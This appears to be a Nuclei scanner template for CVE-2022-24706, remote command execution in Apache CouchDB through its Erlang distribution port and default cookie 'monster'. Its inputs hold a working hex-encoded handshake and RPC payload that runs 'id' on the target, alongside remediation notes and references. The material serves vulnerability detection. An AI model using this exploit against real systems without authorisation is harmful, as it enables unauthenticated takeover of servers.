id: CVE-2022-24706 info: name: CouchDB Erlang Distribution - Remote Command Execution author: Mzack9999,pussycat0x severity: critical description: | In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value. reference: - https://www.exploit-db.com/exploits/50914 - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py - https://nvd.nist.gov/vuln/detail/CVE-2022-24706 - http://www.openwall.com/lists/oss-security/2022/04/26/1 - http://www.openwall.com/lists/oss-security/2022/05/09/1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24706 cwe-id: CWE-1188 epss-score: 0.97372 epss-percentile: 0.99891 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 vendor: apache product: couchdb shodan-query: product:"CouchDB" tags: cve,cve2022,network,couch,rce,kev,couchdb variables: name_msg: "00156e00050007499c4141414141414041414141414141" challenge_reply: "00157201020304" cookie: "monster" cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572" tcp: - host: - "{{Hostname}}" - "{{Host}}:9100" inputs: # auth - data: "{{name_msg}}" type: hex read: 1024 - read: 1024 name: challenge - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}" type: hex # rce - data: "{{cmd}}" type: hex read: 1024 matchers: - type: word part: raw words: - "uid" - "gid" - "groups" condition: and # digest: 4a0a00473045022100c68c00183a56007bd25eac13c71d40998c2af3eef34996ba211b1f2b23910f220220600633a935877e9ddcd8b3ace1122e1351706f4ff443517029bd6782316e80b6:922c64590222798bb761d5b6d8e72950